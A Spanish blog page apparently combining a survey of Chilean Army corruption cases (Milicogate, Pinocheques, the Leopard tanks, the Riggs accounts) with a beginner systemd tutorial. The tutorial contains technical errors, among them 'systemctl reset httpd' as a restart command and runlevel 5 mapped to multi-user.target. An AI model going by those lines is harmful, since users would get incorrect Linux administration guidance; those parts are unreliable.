El vínculo con esta familia fue a través de la Comandancia Guarnición del Ejército de la Región Metropolitana, donde “se encargaban de mantener todo el sistema de escolta, de salud y de apoyo de la gente que custodiaba y atendía al general Pinochet“, indicó el relato del excomandante.

Según el investigado, se partió con “una cantidad gigantesca de personal“, siendo disminuido con el pasar de los años, aunque aun así “con este fin se destinó una cantidad importante de recursos de gastos reservados“. Pese a esto, le aseguró a Rutherford que todas estas medidas de seguridad y cuidado estaban “amparadas en el decreto supremo que avalaba custodiar a los excomandantes en jefe“.

En este procedimiento también se incluyó la declaración del exsecretario general del Ejército Andrés Avendaño, quien aseguró que con el dinero de gastos reservados también se realizó el “pagó placas, arreglos y trabajos de la placa funeraria, todo relacionado con la muerte del general Pinochet“, pese a que finalmente no se ocupó.

Otro punto que admitió Izurieta según Rutherford, es que “a veces la señora del general Pinochet (Lucía Hiriart) lo llamaba solicitando alguna ayuda económica y reconoce que le entregaba los recursos o se los enviaba con alguien“, un hecho que se dio “quizás en dos ocasiones en que le entregó un millón de pesos cada vez“.

En otra parte de sus declaraciones, Izurieta comentó que los gastos reservados fueron también utilizados para realizar actividades con editores, periodistas y columnistas, asegurando que tenían el fin de relacionarse de buena manera con los editores generales de los distintos medios de comunicación y anticipar informaciones que pudieran afectar la imagen del Ejército.

También le afirmó a Rutherford que el lideró una idea para crear un modelo de regalos para matrimonios de militares, un formato que clasificaba los regalos “con las letras ‘A’, ‘B’ y ‘C’, según la persona que se casaba o quien enviaba la invitación. El regalo ‘A’ era una cuchillería que costaba 90 mil pesos aproximadamente y de ahí hacia abajo“.

Asimismo, el exuniformado explicó que recibía entre 70 y 72 millones en gastos reservados en un sobre con dinero en efectivo, mientras que él solicitaba seis millones de pesos más.

Finalmente, Izurieta reconoció haber recibido dineros de gastos reservados en su calidad de excomandante en jefe por un monto de 800 mil pesos mensuales desde abril del 2010 hasta julio de 2017.

Juan Miguel Fuente-Alba

En junio de 2007, en su calidad de juez del Segundo Juzgado Militar de Santiago —por ser comandante en Jefe de la II División de Ejército—falló sobre la causa N° 975-87 sobre falsificación de documentos militares realizado por efectivos del Ejército, que emitieron boletas falsas a productores de manteca, carne, garbanzos, frijoles y membrillos, por lo cual el caso fue denominado «Membrillogate», con el objeto de obtener ingresos a costa del erario fiscal. Fuente-Alba dictó una polémica sentencia, condenando a presidio menor en su grado mínimo a los involucrados, lo cual ha sido criticado por considerarse una pena leve para el tipo de delito cometido.

Fuente-Alba Poblete fue comandante en jefe del Ejército de Chile entre el 9 de marzo de 2010 y el 9 de marzo de 2014.​ Actualmente se encuentra en prisión, procesado por fraude fiscal y enriquecimiento ilícito durante su generalato, tras ser parte en una arista del “Milicogate”. En la formalización de junio del 2019, el fiscal José Morales precisó que durante el período en que estuvo al mando de la institución, realizó gastos por más de $7.324 millones y el perjuicio fiscal por el delito que se le imputa alcanza los $2.980 millones al año 2014. También saltó a la palestra el nombre de la cónyuge del general (r), Anita Pinochet, imputada en la causa, y quien asoma como factor clave del esquema de blanqueo de dinero. Otro dato fue la relación del exjefe castrense con Ditec, empresa a la que adquirió autos de lujo, otra de las “dinámicas” de lavado de dinero empleadas por el exmilitar, según la Fiscalía. Por esta razón en noviembre del 2020 el Consejo de Defensa del Estado amplió la querella a su esposa, conocida como la “Lucía chica”. Según relata el CDE, “de acuerdo con los antecedentes presentes en la indagación penal, consta indubitadamente que la imputada, junto con su cónyuge, habría ocultado, disimulado y aprovechado dineros provenientes de gastos reservados con pleno conocimiento del origen ilícito de los mismos”. Además, relata que realizó diversas operaciones -materiales, financieras y jurídicas-, con el objetivo de “disimular el origen ilícito de los bienes obtenidos”.

Humberto Oviedo

A raíz del mismo Caso FAM, Oviedo fue citado a declarar como testigo por la investigación por el presunto fraude del Fondo de Ayuda Mutua del Ejército; según él, solo en el año 2017 tomó conocimiento de los pagos anómalos por servicios no prestados, una vez que la Contraloría requirió información y una auditoría a la Cuarta División con asiento en Coyhaique dieron luces respecto al caso.

Por otra parte, a fines de diciembre de 2018 respondió por el Caso Pasajes ante la ministra Romy Rutherford, quien lo inculpa por su presunta implicación en el uso de viáticos ilegales. Fue formalizado por permitir la comisión de estos delitos.

“Se somete a proceso a Humberto Patricio Oviedo Arriagada, en su condición de autor de nueve delitos de fraude al fisco, previstos y sancionados en el artículo 239 del Código Penal, por un perjuicio (…) que considerado el valor de la época equivaldrían a una cantidad total de a $57.942.026”, dice la resolución.

Ricardo Martínez

En el marco del caso Pasajes, en el período en que Martínez se desempeñó como subjefe del Estado Mayor (2014-2015) con el grado de general de brigada, registró 30 viajes a distintas regiones del país y al extranjero, con destino a Estados Unidos, África, Europa y América Central. El costo de estos viajes fue de $120 millones, incluyendo el pago de viáticos y los tickets aéreos. Por su parte, en noviembre de 2018 se filtró el audio de una reunión privada que sostuvo con cerca de 900 oficiales, donde señaló que conocía información sobre nexos entre oficiales y el crimen organizado. En particular, apuntó a la compra legal de armas de miembros del Ejército para luego venderlas a narcotraficantes. Tras la divulgación de sus declaraciones, fue citado por el entonces ministro de Defensa, Alberto Espina, a las comisiones de Defensa del Congreso; y ante el exfiscal Raúl Guzmán, para detallar los presuntos antecedentes sobre venta ilegal de armas.

Ahora bien, también encontramos otras diversas actividades delictuales, dentro de las cuales destacan:

Pinocheques

El diario La Nación reveló en los primeros años de la incipiente democracia chilena un escándalo que vinculaba al exdictador Augusto Pinochet Ugarte y su hijo Augusto Pinochet Hiriart.

La historia del caso cuenta como en 1984 Pinochet Hiriart, usando a un amigo como testaferro, compró la empresa metalúrgica Nihasa Limitada, cambiando pronto su nombre por el de PSP (entre sus contratistas figuraron Cema Chile, para la cual elaboró los adornos de metal de sus sedes, así como el Ejército de Chile, para quienes acondicionó camionetas y jeeps para enfrentar supuestas manifestaciones).

En 1987, PSP compró Valmoval, empresa dedicada a la administración de fusiles en el Ejército y que se había declarado recientemente en quiebra. Dos años después, el Ejército vuelve a comprar dicha empresa, pero en una transacción pagada por su padre, Augusto Pinochet, a través de tres cheques por un monto cercano a los tres millones de dólares. Debido a esto el caso se llama ‘Pinocheques’.

Tras la venta, el hijo del dictador viajó a los Estados Unidos donde abrió diversas cuentas bancarias a nombre de su esposa e hijos, con el fin de ocultar el dinero.

En Chile, Pinochet Ugarte presionó de diversas formas para que no se investigara, incluso se reunió en el Edificio de las Fuerzas Armadas, a solo 200 metros del Palacio de la Moneda, con oficiales del Ejército escoltados por soldados armados y vestidos con trajes de combate, por cuyas boinas negras al suceso se le conoció como “el boinazo” durante el gobierno de Patricio Aylwin.

En el mandato siguiente, Frei Ruiz Tagle ordenó al Consejo de Defensa del Estado (CDE) cerrar el caso definitivamente, aduciendo a la razón de Estado y Pinochet Hiriart quedó impune.

Tanques Leopard

En 1998, el Ejército de Chile gestó la adquisición de una partida de 202 tanques Leopard I holandeses, vehículos militares que se ofertaron a un precio de US$350 mil por unidad, lo que hizo que los costos totales de la operación llegaran a US$80 millones.

No obstante, en mayo de 2009 trascendió que la Fiscalía Oriente llevaba adelante, desde 2007, una indagatoria por el presunto pago de comisiones a civiles y militares, a raíz de la compra de estos blindados.

De acuerdo a los antecedentes conocidos, la Brigada de Lavado de Activos de la Policía de Investigaciones (PDI) había detectado traspasos de dineros en cuentas de militares vinculados a la operación, hasta el año 2005.

Según la información, durante la venta de los tanques, la empresa intermediaria del negocio – la firma holandesa ‘RDM Technology’- habría pagado US$7,5 millones a altos mandos del Ejército, a través de Guillermo Ibieta, sindicado como el gestor chileno de la compra.

De igual forma, la compañía holandesa confirmó el pago de US$1,6 millones a una sociedad representada por el exalbacea de Augusto Pinochet, el abogado Óscar Aitken, quien a su vez reconoció haber asesorado legalmente a la empresa holandesa, en la venta de estos vehículos.

La indagatoria del caso fue asumida por el Ministro en Visita Manuel Valderrama, cuyas indagaciones le condujeron hasta el otrora secretario privado del General Pinochet, Brigadier (R) Gustavo Latorre, y al ex Director de las Fábricas y Maestranzas del Ejército (FAMAE), General (R) Luis Iracabal, quienes fueron acusados de haber recibido US$ 600 mil, tras la compra (El Mercurio, 2009).

De hecho, el 23 de mayo de 2009, el magistrado inició una serie de interrogatorios por los presuntos ilícitos asociados a esta operación, tomando declaración al propio General (R) Iracabal; y al General (R) Guillermo Garín, ex Vicecomandante en Jefe del Ejército, y quien entonces dirigiera el comité de adquisiciones, instancia que aprobó la compra de los blindados (El Mercurio, 2009c). Tras estas diligencias, el juez dictó sus primeras resoluciones, procesando por malversación de caudales públicos al General (R) Iracabal y al Brigadier (R) Latorre (El Mercurio, 2009).

El magistrado igualmente decidió interrogar por escrito al exMinistro de Defensa Edmundo Pérez Yoma, así como al ex Subsecretario de Guerra Mario Fernández, quienes debieron aclarar el rol que tuvieron en la adquisición de los tanques, junto con las razones que derivaron en la firma del decreto del Ministerio de Defensa, que a su vez autorizó la compra por US$63 millones, 8,5 millones más de los que contemplaba la propuesta original de la empresa holandesa (El Mercurio, 2009).

El 11 de agosto de ese mismo año, en tanto, Ibieta debió prestar declaración ante la Fiscalía de Ñuñoa, siendo consultado por los presuntos depósitos que habría recibido durante 2006. En paralelo, el Ministro Valderrama interrogó nuevamente, y en calidad de inculpados, al General (R) Iracabal y al Brigadier (R) Latorre, quienes fueron inquiridos acerca del rol que tuvieron en la compra de los tanques (El Mercurio, 2009). Por su parte, la Comisión Investigadora sobre los casos ‘Mirage’ y ‘Leopard’ conoció el testimonio del abogado Héctor Salazar y de su cliente Pedro del Fierro, este último acusado de extorsionar al entonces Ministro del Interior, Edmundo Pérez Yoma.

En la oportunidad, Salazar acusó a esta cartera de financiar la defensa de los militares procesados en el caso (La Nación, 2009).

Por otra parte, la misma instancia tomó conocimiento, en noviembre de 2009, de las actas del Consejo Superior de la Defensa Nacional (CONSUDENA), referidas a la decisión de compra de los blindados (Cámara de Diputados de Chile, 2009).

Finalmente, hacia fines de marzo de 2016, la Corte Suprema emitió una sentencia condenatoria, por 541 días de presidio, con el beneficio de la remisión condicional de la pena, en contra del General (R) Iracabal y el Brigadier (R) Latorre, por su responsabilidad en el delito de malversación de caudales públicos, durante el proceso de compra de los blindados.

El fallo consignó que los exuniformados fueron responsables de sustraer, cada uno, una cantidad cercana a los US$ 300 mil, correspondientes a la adquisición de 200 vehículos de este tipo, en julio de 1998 (El Mostrador, 2016).

Caso Riggs

En julio de 2004 el Senado de los Estados Unidos comenzó a investigar movimientos extraños en el Banco Riggs, el más importante de dicho país. Así se dieron cuenta que Augusto Pinochet Ugarte llegó a tener 125 cuentas bancarias fuera de Chile y con una serie de precauciones junto a su familia para esconder una fortuna estimada en US$27 millones.

El Consejo de Defensa del Estado demandó a la familia Pinochet y el juez Sergio Muñoz tomó la causa el 7 de junio de 2005. A Pinochet le retiraron la inmunidad de la que gozaba por presunta implicación en cuatro delitos: fraude al Fisco, uso de pasaportes falsos, declaración jurada de bienes falsa y por eludir medidas cautelares sobre sus bienes. Un mes después la esposa y el hijo menor también fueron procesados por su complicidad en el fraude tributario y Pinochet emitió una declaración asumiendo toda responsabilidad por las cuentas.

Tras la muerte del dictador, la causa se sobreseyó para la familia Pinochet, solo los coroneles en retiro Gabriel Vergara, Juan Ricardo Mac-Lean y Eugenio Castillo fueron condenados a cuatro años de libertad vigilada, mientras que los generales Jorge Ballerino y Ramón Castro fueron condenados a una multa de 11 UTM. Además, la Corte determinó el decomiso de bienes de propiedad de Pinochet por un total de US$1.621.554,46.

Uniformes

Una querella por delitos de fraude al Fisco y tributarios, presentó en el mes de mayo de 2016 Patricio Reyes, proveedor del Ejército, en contra de Virgilio Cartoni, principal vendedor de armas y vituallas para la institución, por supuestas anomalías en una millonaria licitación por más de US$11 millones, referida a la compra de uniformes de combate. También fue querellado el general (r) Antonio Cordero Kehr, que en 2011, cuando comienzan a ocurrir los hechos denunciados, era el jefe del Comando de Apoyo de la Fuerza (CAF).

El libelo apuntaba a que la empresa de Cartoni, Comercializadora, Exportadora e Importadora CyM, S.A., habría evitado pagar impuestos por más de mil millones de pesos gracias a la complicidad de funcionarios castrenses, quienes habrían modificado dolosamente las bases del concurso para favorecer a la firma.

Lavandería

En agosto de 2016 CIPER Chile informó que el general Juan Miguel Fuente-Alba compró en 22,8 millones de pesos su primer vehículo Audi, en Klassik Car. En la transacción el militar entregó otro Audi en parte de pago, tasado en $18 millones y propiedad de Germán Korff Pfeiffer, dueño de una lavandería que funcionaba hace más de veinte años en la Escuela Militar. En la última década Korff facturó cerca de $2.260 millones al Ejército. A mediados de 1990, la Escuela Militar decidió externalizar el servicio de lavado de ropa. Fue entonces cuando la sociedad de Korff ganó la licitación para proveer ese servicio a los militares.

Este no es el único vínculo de Korff con el mundo militar. También integró una sociedad agrícola con Pedro del Fierro, el comerciante de armas que participó junto a otros en la cuestionada negociación para la compra de los tanques Leopard adquiridos por el Ejército en 1998, y que fue acusado de intentar extorsionar al exministro de Defensa, Edmundo Pérez Yoma. La lavandería de Korff también ha obtenido licitaciones del Comando de Bienestar del ejército (COB) para proveer del servicio de lavandería al Club Militar de Campo Peñalolén y al Centro Recreacional Farellones.

Matrimonio

En agosto de 2016 se reveló una lujosa fiesta de matrimonio de uno de los hijos del general Fuente-Alba efectuada en el Museo Histórico Militar con los servicios del banquetero Paulo Russo, señalado entre los más caros de la plaza. La fiesta fue investigada por la Fiscalía Centro Norte, como parte una indagatoria de oficio por denuncias que apuntan al millonario patrimonio del general en retiro. El fiscal José Morales tomó declaraciones a Fuente-Alba y a su cónyuge en varias ocasiones. El matrimonio indagado se celebró el 31 de agosto de 2013 y asistieron unas 700 personas y costó cerca de $30 millones.

Visores nocturnos

En mayo de 2015 se firmó un contrato entre el Ejército y la empresa belga OIP Sensors Systems, representada en Chile por Virgilio Cartoni, para la adquisición de visores nocturnos por un monto total de US$16 millones. El acuerdo se selló pese a que existían reclamos ante la Contraloría General de la República de dos de las empresas que participaron en la cuestionada licitación, Theon Sensors S.A. y Comercial Magnatrade Tech, representante de la estadounidense Exelis. La polémica se arrastra desde diciembre de 2014, cuando el Comando de Apoyo a la Fuerza, bajo el mando del general Iván González, adjudicó la licitación a OIP Sensor Systems. Las dos compañías reclamantes alegaban la existencia de irregularidades. Uno de los reclamos era que Cartoni se reunió con el abogado y coronel Alex Guzmán, miembro de la comisión de evaluación de la licitación, lo cual estaba prohibido en las bases.

Casa de protocolo

En enero de 2011 trascendió que la Contraloría investigaba al general Cristián Le Dantec, jefe del Estado Mayor Conjunto de las Fuerzas Armadas, luego que la empresa Mar Azul, dedicada a la venta de contenedores habitables, lo denunciara ante el organismo fiscalizador por cometer supuestas irregularidades en una licitación. Le Dantec ya estaba cuestionado por la Contraloría por el intento de adquirir una “casa de protocolo” avaluada en más de un millón de dólares. Le Dantec había exigido que la casa tuviera una pieza de servicio con baño, sala de lavado y planchado, living separado del comedor, comedor principal y comedor de diario, piscina, sala de estar distinta del living, jardín con sistema de riego automático y sistema de calefacción central, entre otras características.

Helicópteros

En noviembre de 2009 The Clinic publicó un artículo sobre las anomalías detectadas en un proceso de modernización de los helicópteros del Comando de Aviación del Ejército (CAVE) denominado “Proyecto Centauro”, efectuado desde 2002 y que era investigado por el juez Manuel Valderrama. Dentro de las propuestas evaluadas para la adquisición estuvieron las naves usadas Súper Puma AS 332 y Puma SA 330, los modelos nuevos AS 532 Cougar, ofrecido por Eurocopter a 16 millones de dólares la unidad, y el MI-17, de la rusa Kazan Helicopters, a 7 millones de dólares. Uno de los oficiales evaluadores, Carlos Díaz Kastowsky, descartó a los primeros, sobre la base de un informe efectuado en 2002 por el coronel Hugo Barría Rogers, donde se aseguraba que la aeronave rusa superaba “en el doble las capacidades del helicóptero SA-330 Puma”. La opinión de Díaz no fue atendida. Es más, el entonces mayor Carlos Ricotti, le ordenó escribir un documento que beneficiara a la empresa Eurocopter. Con esa presión encima y consciente de las anomalías en la compra, Díaz pidió una audiencia con el entonces comandante en jefe del ejército, Óscar Izurieta, a quien le entregó una carta denunciando los hechos. En noviembre de 2007 el general Izurieta suspendió la compra de helicópteros, pasó a retiro al jefe de esa unidad, Jorge Gualda, y ascendió al oficial Díaz Kastowsky, enviándolo al extranjero.

Eurocopter volvió a insistir en la venta a través de CYM, su representante en Chile, propiedad de Virgilio Cartoni, ofreciendo otra vez los helicópteros AS 532 Cougar, consiguiendo que el ejército decidiera finalmente comprarlos. El contrato se firmó a fines de noviembre de 2007 por ocho aeronaves, en una suma total que bordeó los US$170 millones.

El coronel Barría Rogers, en tanto, quien se había pronunciado a favor de los helicópteros rusos, fue designado agregado militar en la embajada de Chile en Francia, pero debió pasar a retiro en julio de 2006, luego que detectives lo interrogaran en Francia por su participación en el lanzamiento al mar de los cuerpos de los cinco frentistas desaparecidos en septiembre de 1987. Barría era el copiloto del helicóptero usado para trasladar los cuerpos. Tras su salida del Ejército, Barría Rogers se convirtió en ejecutivo de CYM, la empresa de Cartoni, donde también laboraba el general (r) Hernán Ramírez Hald, exdirector del Comando de Industrias Militares e Ingeniería, involucrado como cómplice en el asesinato de Tucapel Jiménez.

Insumos médicos

Cartoni también tuvo participación en el negocio de los insumos médicos a través de otra empresa llamada Comercializadora de Insumos Médicos CyM Limitada. En ella se asoció con Mario Marshall L’Huillier, coronel en retiro que pasó por la DINA y tuvo instrucción de contrainsurgencia urbana en la Escuela de las Américas en 1974.

En marzo de 2001 CyM Limitada actuaba con el nombre de fantasía Insumed cuando fue denunciada por Contraloría tras detectar irregularidades y sobreprecios en la venta de productos médicos al Hospital Militar. Insumed estaba formada por tres socios: el teniente (r) Virgilio Cartoni Maldonado, el comandante (r) Mario Marshall González y el coronel (r) Mario Marshall L’Huillier.

Milicogate

Es el fraude más grande conocido hasta hoy que ha cometido el Ejército, donde se desviaron fondos de $6.100 millones de la Ley Reservada del Cobre con otros fines. Fue dado a conocer en una serie de reportajes por el periodista Mauricio Weibel el año 2015.

Los fraudes consistían en el uso de boletas y facturas falsas para extraer el dinero, las cuales no estaban reconocidas por el Servicio de Impuestos Internos, mediante la compra de material bélico inexistente. Dentro de los involucrados se encuentran el coronel Clovis Montero y el cabo Juan Carlos Cruz, ambos relacionados con las finanzas del Ejército. El dinero pertenecía a saldos sobrantes de, por ejemplo, cambios de peso chileno a dólar estadounidense. Se emitían facturas por servicios no prestados de proveedores del Ejército, como Frasim (Francisco Huincahue), Raúl Fuentes Quintanilla y Waldo Pinto. El encargado de extraer los fondos era Cruz, que trabajaba en la contabilidad del Ejército, mientras Montero se encargaba de conseguir las facturas y apurar los pagos.

En marzo de 2014, mientras revisaba unas facturas, el Tesorero del Ejército, el coronel Samuel Poblete, detecta irregularidades y se da cuenta de que la firma y el puesto de uno de los oficiales que firmaba no correspondían. Al tomar contacto con uno de ellos, pudo comprobar que estaba frente a un fraude, informando de ello de forma inmediata. Al exigir explicaciones al coronel Montero, este se desliga del hecho, inculpando de todo al cabo Cruz.

El caso es investigado por la abogada Paola Jofré, de la VI Fiscalía Militar. En los llamados a declarar de los imputados, ninguno reconoce estar completamente involucrado en la malversación de fondos. Mientras se revisaban más facturas, otras en situación irregular aparecían, pasando de unas decenas de millones de pesos al nivel de miles de millones de pesos, los cuales en palabras del coronel Montero “Se gastaron la plata en casinos, propiedades, caballos y fiestas”. Entre los gastos más sonados, está el gasto de más de $2.000 millones en casinos. El nivel y alcance de las acusaciones llegaron a provocar la entrada de la justicia ordinaria con una querella de parte del Consejo de Defensa del Estado en contra de los responsables civiles.

En 2016, el general (R) Héctor Ureta junto con el por entonces diputado Jaime Pilowsky denunciaron un supuesto borrado de datos desde los servidores del Comando de Ayuda de la Fuerza, sospechando de una red más amplia de implicados. El diputado hizo hincapié en el nulo control de los asuntos militares por parte del poder político.

En abril de 2016, el ministro en visita Omar Astudillo citó al excomandante en jefe, General (r) Juan Miguel Fuente-Alba debido a que poseía más de 1000 millones de pesos en bienes, los cuales presuntamente no tienen justificación. Se presentaron pruebas como traspaso de automóviles de lujo, traspaso de bienes raíces y sociedades entre la familia del general. Debido a los costos de sus inversiones y compras comparadas con su sueldo de unos cuatro millones, se inició una causa por incremento patrimonial injustificado. En mayo de 2016 el proveedor del Ejército Patricio Reyes presentó una querella en contra de Virgilio Cartoni por irregularidades en la compra de uniformes militares, en cuya licitación no se pagaron impuestos por más de 1000 millones de pesos y hubo un sobreprecio de alrededor de 302 millones de pesos. Las compras realizadas por Cartoni (Comercializadora, Exportadora e Importador CyM S.A.) se realizaron por una empresa externa (Servicios de Abastecimiento y Mantención Limitada) de propiedad del empresario iquiqueño Jorge Neira Hernández. Además se presentó otra querella en contra del general (r) Antonio Cordero por autorizar la licitación. Sin embargo, esta acusación de parte del proveedor Reyes se consideró que carecía de sustento, por cuanto el sistema de adquisiciones del Ejército para los montos involucrados exige la aprobación a través del Comité Permanente de Adquisiciones, con una resolución del propio Comandante en Jefe. En agosto de 2016, la comisión especial investigadora de la Cámara de Diputados (responsable de indagar las responsabilidades administrativas en el fraude), publicó en su página los resultados de la investigación. Entre las conclusiones, se destacan la falta de fiscalización de Contraloría General de la República, poco control legislativo por parte del Ministerio de Defensa y la responsabilidad del excomandante en jefe Fuente-Alba en el monitoreo de gastos. Además responsabilizó a los generales que ejercieron el mando de la Contraloría del Ejército y del Comando de Apoyo a la Fuerza, calificándolos de negligentes. La principal recomendación hecha fue la derogación de la Ley Reservada del Cobre.

Dos años más tarde, el 5 de octubre de 2018, el Séptimo Juzgado de Garantía de Santiago, zanjó la decisión de la persecutora de Alta Complejidad de la Fiscalía Centro Norte, Ximena Chong, de no perseverar en la investigación por delitos tributarios que se seguía en contra del proveedor del Ejército Virgilio Cartoni, lo que dejó sin sustento la acusación del proveedor Reyes.

Violaciones sexuales en Haití

A mediados de diciembre de 2019 se conoció que efectivos de instituciones armadas de Chile aparecían eventualmente involucrados en casos de violaciones en Haití, mientras se desempeñaron como parte de la misión de Paz de la Naciones Unidas, conocida como MINUSTAH, entre 2004 y 2017. La información, que se desprendió de un artículo publicado el 17 de diciembre de 2019 en la revista académica The Conversation por las investigadoras y académicas, Sabine Lee y Susan Bartles, concluye que hubo 265 casos de bebés nacidos de encuentros entre personal militar de diversos países y niñas y mujeres haitianas, bajo diversos tipos de relaciones, lo que también incluye el abuso. De esos casos, según un cuadro comparativo que se publicó en la misma investigación, Chile se ubica detrás de Brasil y Uruguay como las naciones con más imputaciones de paternidades de bebés abandonados en el citado país, con alrededor de 20 casos.

78 comentarios

Gestionar, administrar y configurar servicios en GNU/Linux

Publicada el 21/02/2022 - 20/02/2022 por Anonymous Chile

Systemd es un conjunto de demonios o daemons, herramientas, librerías y servicios diseñados para administrar y configurar de manera centralizada todos los servicios en sistemas operativos GNU/Linux. Systemd nos permite interactuar directamente con el núcleo o kernel del sistema operativo.

SysV ha sido desplazado de GNU/Linux y sustituido por systemd.

Crea un servicio o daemon propio

Lo primero que debemos hacer es entrar en la ruta donde se encuentran todos los servicios de Systemd, en nuestro caso pondremos los ejemplos haciendo uso de Debian, pero la ruta en los diferentes sistemas operativos es exactamente la misma, no debería haber ninguna diferencia.

La ruta donde debemos dirigirnos para ver todos y cada uno de los servicios es «/etc/systemd/system/», por lo tanto, si usamos el comando «cd» vamos a poder ir hasta esta ruta sin problemas:

Si hacemos un «ls» para listar todos los servicios, vamos a poder ver todos los que hay creados de forma predeterminada. Dependiendo de los programas que hayas instalado, tendremos unos servicios u otros.

[Unit]
Description=Daemon TTRSS Auto-Update Feeds
After=network.target mysql.service
[Service]
User=www-data
ExecStart=/var/www/html/rss/update_daemon2.php
[Install]
WantedBy=multi-user.target

Debemos tener en cuenta que este servicio se iniciará siempre con el sistema operativo, a no ser que decidas que no sea así.

A continuación, mostramos el significado de cada una de las partes del fichero de configuración anterior.

Opciones básicas:

  • Description: Podemos introducir aquí el nombre y una descripción de lo que va a hacer nuestro daemon, en este caso podemos poner lo que nosotros queramos, es una descripción de cara al administrador de sistemas, para conocer qué hace el daemon sin necesidad de mirar más código.
  • After: Indicaremos si queremos que se cargue después de otros servicios o componentes del sistema. Esto es algo muy importante, porque si nuestro servicio requiere que otro servicio esté levantado, entonces tendremos que seguir una secuencia en concreto. También existe otra directiva llamada «Before» que hace lo contrario, indicando que nuestro servicio se ejecute antes que ese otro servicio que nosotros especificamos.
  • User: El usuario del sistema operativo que ejecutará el daemon. También puede funcionar con Group. Esto es muy importante, porque dependiendo de los permisos que necesite el servicio, tendremos que ejecutarlo con root, nuestro usuario no privilegiado o cualquier otro usuario del sistema.
  • ExecStart: Debemos indicar la ruta absoluta (no funcionan relativas) al script o binario que queremos ejecutar para arrancar el servicio en cuestión.
  • WantedBy: Directivas de uso y otras dependencias.

Opciones completas:

  • Description. Aquí puedes introducir la definición o descripción del servicio. Esta información es la que aparecerá en el log y en la salida del comando systemctl status. Es decir, que tiene que ser suficientemente descriptiva para ti.
  • After. Esta directiva indica que nuestro servicio tiene que iniciarse después de que la red esté lista. En el caso de que tuvieramos que esperar a que estuvira listo MariaDB, la directiva sería tal como After=mysqld.service. También podemos encadenar varios servicios, separados por espacio, por ejemplo:
After=syslog.target network.target sshd.service
  • ExecStart. Aquí debe figurar la ruta al ejecutable, así como los parámetros necesarios para que arranque.
  • Type. Permite configurar el inicio de nuestro servicio, de manera que tenemos lo siguiente:
  1.         simple. El proceso empieza con ExecStart y es el principal proceso del servicio.
  2.         forking. En este caso se lanza un proceso hijo, que se convierte en el proceso principal.
  3.         oneshot. El proceso termina antes de comenzar con las siguientes unidades.
  4.         dbus. Las siguientes unidades empezarán cuando el proceso principal tegan el D-Bus.
  5.         notify. En este caso depende de un mensaje de notificación enviado por sd_notify.
  6.         idle. La ejecución del servicio se retraza hasta que todos los trabajos han terminado.
  • Restart. Por defecto Systemd, no reinicia tu servicio en caso de que este caiga, por la razón que sea. Sin embargo, a ti lo que te interesa es que tu servicio siempre esté en funcionamiento. Para lograr esto, tienes que poner la directiva Restart=always. Otra opción es utilizar Restart=on-failure, en cuyo caso solo se reinicializará si el servicio se ha parado por fallo.
  • RestartSec. Te permite definir el tiempo que debe transcurrir hasta que se intente poner de nuevo en marcha tu servicio. Por defecto, Systemd, trata de levantar el servicio, transcurrido 100 ms. Con esta directiva, tu puedes establecer el tiempo en segundos. Sin embargo, es interesante que dejes como mínimo un segundo para no forzar la máquina.
  •  StartLimitBurst y StartLimitIntervalSec. Estos dos parámetros te permitirán definir cuantos intentos StartLimtBurs y en que intervalo StartLimitIntervalSec, vas a permitir para que se restablezca el servicio. Por defecto, Systemd permite 4 intentos en 10 segundos. Por supuesto estableciendo RestartSec=3 nunca se alcanzarán estos valores.
  •   StartLimitIntervalSec=0, obligará a Systemd a reiniciar el servicio tantas veces como sea necesario.
  •  WantedBy. Esto equivale al runlevel. Establece el objetivo (Target) u objetivos bajo los que el servicio debería ser iniciado.

Objetivos o Targets

Los objetivos existentes los puedes ver en la siguiente tabla:

Runlevel     Objetivo     Descripción
0     poweroff.target     Apagado del sistema
1     rescue.target     Shell de rescate
2     multi-user.target     Sistema no gráfico
3     multi-user.target     Sistema no gráfico
4     multi-user.target     Sistema no gráfico
5     multi-user.target     Sistema gráfico
6     reboot.target     Apagado y reinicio

Para conocer cual es el objetivo definido por defecto, tienes que ejecutar la siguiente orden:

systemctl get-default

Gestionar servicios en tu distribución GNU/Linux

¿Cómo saber el sistema que usa mi distribución GNU/Linux? Buscando estas rutas, y si las tienes, tendrás ese sistema:

  • Para saber si tienes systemd: Busca la ruta /usr/lib/systemd
  • Para saber si tienes Upstart: Busca esta otra ruta /usr/share/upstart
  • Para saber si tienes SysV init: Busca el path /etc/init.d
  • Hay otros, aunque sea algo más raro, en esos casos particulares, puedes hacer algo similar si sospechas que no son los anteriores.

Otra forma de hacerlo incluso más sencilla, porque es la misma para todos, es buscar info en /proc sobre el PID=1, es decir, el primer proceso del que cuelgan el resto y que se corresponde precisamente con este demonio de inicio. Para ello, solo ejecuta el siguiente comando y te devolverá el nombre:

sudo stat /proc/1/exe

Ahora ya sabes qué sistema tienes, por tanto, vamos a los comandos que puedes usar para gestionar servicios:

  • SysV init: /etc/init.d/[nombre_demonio_servicio] [acción]
  • systemd: systemctl [acción] [nombre_demonio_servicio]
  • Upstart: service [nombre_demonio_servicio] [acción]
  • Otros: Si usas otro sistema diferente, es mejor que mires el manual. Por ejemplo, algunos casos raros en Linux y otros Unix puede que usen la señal del proceso SIGHUP para restablecer un servicio: kill -HUP $(cat /var/run/[servicio-PID])

Tienes que sustituir [acción] por lo que necesitas hacer. Por ejemplo, si necesitas reiniciar, pues usa reset, si quieres parar usa stop, si quieres poner en marcha usa star, etc. Y sustituye [nombre_demonio_servicio] por el nombre del demonio del servicio que quieres poner en marcha. Por ejemplo:

systemctl reset httpd

Gestionar Servicios con SystemD

Habilitar servicio al iniciar PC

Ahora que ya hemos creado el servicio en el sistema operativo, antes de poder empezar a utilizarlo debemos habilitarlo con el comando «enable». Para poder hacer esto, simplemente tenemos que ejecutar el comando «systemctl enable» seguido del nombre del servicio que acabamos de crear. No es necesario ejecutar esto en la misma ruta donde se almacenan los archivos, en nuestro caso sería:

systemctl enable ttrssupdate.service

Por supuesto, nos pedirá la contraseña de superusuario del sistema para poder habilitarlo adecuadamente, para este tipo de tareas es fundamental tener permisos de superusuario, de lo contrario no podremos hacer nada.

Ahora que ya hemos habilitado el servicio, lo tenemos que iniciar manualmente la primera vez. A partir de este momento siempre estará en ejecución, incluso cuando reiniciemos el sistema operativo, este servicio también arrancará automáticamente.

systemctl start ttrssupdate.service

En estos instantes, ya estará el servicio activo en nuestro sistema operativo. Aunque systemd puede ser bastante complicado si nos metemos en cosas avanzadas, crear un servicio no es demasiado complicado, tal y como habéis visto a lo largo de este tutorial. A continuación, os vamos a enseñar otros comandos muy útiles para administrar nuestro servicio recién creado:

